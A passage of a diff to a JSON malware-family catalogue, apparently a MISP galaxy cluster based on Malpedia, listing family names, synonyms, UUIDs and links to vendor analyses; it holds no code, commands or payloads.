"759f8590-a049-4c14-be8a-e6605e2cd43d", - "value": "r2r2", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" - ] - } - }, - { - "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", - "value": "Ztorg", - "description": "", - "meta": { - "synonyms": [ - "Qysly" - ], - "type": [], - "refs": [ - "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", - "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", - "https://securelist.com/ztorg-from-rooting-to-sms/78775/" - ] - } - }, - { - "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", - "value": "Bashlite", - "description": "", - "meta": { - "synonyms": [ - "lizkebab", - "qbot", - "torlus", - "Gafgyt", - "gayfgt" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/" - ] - } - }, - { - "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", - "value": "smac", - "description": "", - "meta": { - "synonyms": [ - "speccom" - ], - "type": [], - "refs": [ - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" - ] - } - }, - { - "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", - "value": "Delta(Alfa,Bravo, ...)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" - ] - } - }, - { - "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", - "value": "Biscuit", - "description": "", - "meta": { - "synonyms": [ - "zxdosml" - ], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", - "value": "Unidentified 024 (Ransomware)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malwrhunterteam/status/789161704106127360" - ] - } - }, - { - "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", - "value": "Venus Locker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/813690129088937984" - ] - } - }, - { - "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", - "value": "JQJSNICKER", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://marcmaiffret.com/vault7/" - ] - } - }, - { - "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", - "value": "APT3 Keylogger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/", - "https://twitter.com/smoothimpact/status/773631684038107136", - "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" - ] - } - }, - { - "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", - "value": "Charger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.checkpoint.com/2017/01/24/charger-malware/", - "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" - ] - } - }, - { - "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", - "value": "Unidentified APK 001", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/illegalFawn/status/826775250583035904" - ] - } - }, - { - "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", - "value": "Polyglot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" - ] - } - }, - { - "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", - "value": "Ebury", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", - "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", - "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", - "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", - "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf" - ] - } - }, - { - "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", - "value": "DeputyDog", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" - ] - } - }, - { - "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", - "value": "EHDevel", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" - ] - } - }, - { - "uuid": "c359c74e-4155-4e66-a344-b56947f75119", - "value": "RCS", - "description": "", - "meta": { - "synonyms": [ - "Remote Control System", - "Crisis" - ], - "type": [], - "refs": [ - "https://www.f-secure.com/documents/996508/1030745/callisto-group", - "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" - ] - } - }, - { - "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", - "value": "CryptoShuffler", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" - ] - } - }, - { - "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", - "value": "Red Alert", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/816237293073797121" - ] - } - }, - { - "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", - "value": "Opachki", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://forum.malekal.com/viewtopic.php?t=21806", - "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", - "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", - "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html" - ] - } - }, - { - "uuid": "495377c4-1be5-4c65-ba66-94c221061415", - "value": "Corebot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", - "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" - ] - } - }, - { - "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", - "value": "systemd", - "description": "General purpose backdoor", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" - ] - } - }, - { - "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", - "value": "Slempo", - "description": "", - "meta": { - "synonyms": [ - "SlemBunk" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html", - "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html" - ] - } - }, - { - "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", - "value": "DownPaper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/charmingkitten/" - ] - } - }, - { - "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", - "value": "MobiRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" - ] - } - }, - { - "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", - "value": "Hajime", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "https://x86.re/blog/hajime-a-follow-up/", - "http://blog.netlab.360.com/hajime-status-report-en/", - "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", - "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", - "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", - "https://github.com/Psychotropos/hajime_hashes" - ] - } - }, - { - "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", - "value": "DarkShell", - "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" - ] - } - }, - { - "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", - "value": "murkytop", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - } - }, - { - "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", - "value": "KevDroid", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/", - "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" - ] - } - }, - { - "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", - "value": "Powmet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" - ] - } - }, - { - "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", - "value": "Luzo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", - "value": "MILKMAID", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", - "value": "Dridex", - "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", - "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", - "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", - "https://viql.github.io/dridex/", - "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] - } - }, - { - "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", - "value": "NewsReels", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "88d70171-fc89-44d1-8931-035c0b095247", - "value": "Unidentified 041", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "542161c0-47a4-4297-baca-5ed98386d228", - "value": "Ramnit", - "description": "", - "meta": { - "synonyms": [ - "Nimnul" - ], - "type": [], - "refs": [ - "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", - "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", - "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", - "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", - "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", - "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf" - ] - } - }, - { - "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", - "value": "Zyklon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html" - ] - } - }, - { - "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", - "value": "Gratem", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] - } - }, - { - "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", - "value": "GoldDragon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] - } - }, - { - "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", - "value": "Fake Pornhub", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", - "value": "Herbst", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" - ] - } - }, - { - "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", - "value": "TeleBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] - } - }, - { - "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", - "value": "XOR DDoS", - "description": "Linux DDoS C&C Malware", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", - "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", - "https://en.wikipedia.org/wiki/Xor_DDoS" - ] - } - }, - { - "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", - "value": "HtBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", - "value": "Coinminer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/", - "https://secrary.com/ReversingMalware/CoinMiner/" - ] - } - }, - { - "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", - "value": "Apocalypse", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" - ] - } - }, - { - "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", - "value": "Kwampirs", - "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" - ] - } - }, - { - "uuid": "59c161f4-bb09-4590-9eec-e4d5db3ecb2e", - "value": "win.remy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", - "value": "Downeks", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" - ] - } - }, - { - "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", - "value": "KoobFace", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", - "value": "Tarsip", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", - "value": "Lyposit", - "description": "", - "meta": { - "synonyms": [ - "Lucky Locker", - "Adneukine", - "Bomba Locker" - ], - "type": [], - "refs": [ - "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", - "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", - "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" - ] - } - }, - { - "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", - "value": "Poison Ivy", - "description": "", - "meta": { - "synonyms": [ - "pivy", - "poisonivy" - ], - "type": [], - "refs": [ - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", - "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", - "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", - "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", - "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", - "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", - "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", - "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - } - }, - { - "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", - "value": "SAGE", - "description": "", - "meta": { - "synonyms": [ - "Saga" - ], - "type": [], - "refs": [ - "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", - "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", - "http://malware-traffic-analysis.net/2017/10/13/index.html", - "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/" - ] - } - }, - { - "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", - "value": "Remsec", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" - ] - } - }, - { - "uuid": "a0881a0c-e677-495b-b475-290af09bb716", - "value": "Alma Communicator", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" - ] - } - }, - { - "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", - "value": "OnlinerSpambot", - "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.", - "meta": { - "synonyms": [ - "SBot", - "Onliner" - ], - "type": [], - "refs": [ - "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" - ] - } - }, - { - "uuid": "f64683c8-50ab-42c0-8b90-881598906528", - "value": "Shakti", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" - ] - } - }, - { - "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", - "value": "TabMsgSQL", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", - "value": "Hermes", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" - ] - } - }, - { - "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", - "value": "CherryPicker POS", - "description": "", - "meta": { - "synonyms": [ - "cherrypicker", - "cherrypickerpos", - "cherry_picker" - ], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" - ] - } - }, - { - "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", - "value": "Ranscam", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintel.com/2016/07/ranscam.html" - ] - } - }, - { - "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", - "value": "ComodoSec", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" - ] - } - }, - { - "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", - "value": "Wirenet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", - "https://news.drweb.com/show/?i=2679&lng=en&c=14" - ] - } - }, - { - "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", - "value": "Narilam", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", - "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" - ] - } - }, - { - "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", - "value": "Skygofree", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", - "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" - ] - } - }, - { - "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", - "value": "MPKBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - } - }, - { - "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", - "value": "prb_backdoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" - ] - } - }, - { - "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", - "value": "Petya", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", - "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/", - "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/" - ] - } - }, - { - "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", - "value": "OnionDuke", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.f-secure.com/weblog/archives/00002764.html", - "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html" - ] - } - }, - { - "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", - "value": "Rovnix", - "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).", - "meta": { - "synonyms": [ - "BkLoader", - "Cidox", - "Mayachok" - ], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", - "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", - "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", - "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", - "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", - "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" - ] - } - } - ], - "version": 1, - "source": "Malpedia", - "name": "Malpedia", - "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e" + "description": "Malware galaxy cluster based on Malpedia.", + "type": "malpedia", + "authors": [ + "Daniel Plohmann", + "Steffen Enders", + "Andrea Garavaglia", + "Davide Arcuri" + ], + "values": [ + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", + "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" + ] + }, + "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", + "value": "AdultSwine", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", + "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", + "https://github.com/DesignativeDave/androrat" + ] + }, + "uuid": "80447111-8085-40a4-a052-420926091ac6", + "value": "AndroRAT", + "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/", + "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf" + ] + }, + "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", + "value": "AnubisSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" + ] + }, + "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", + "value": "Bahamut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", + "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", + "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", + "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", + "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/" + ] + }, + "uuid": "85975621-5126-40cb-8083-55cbfa75121b", + "value": "BankBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", + "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", + 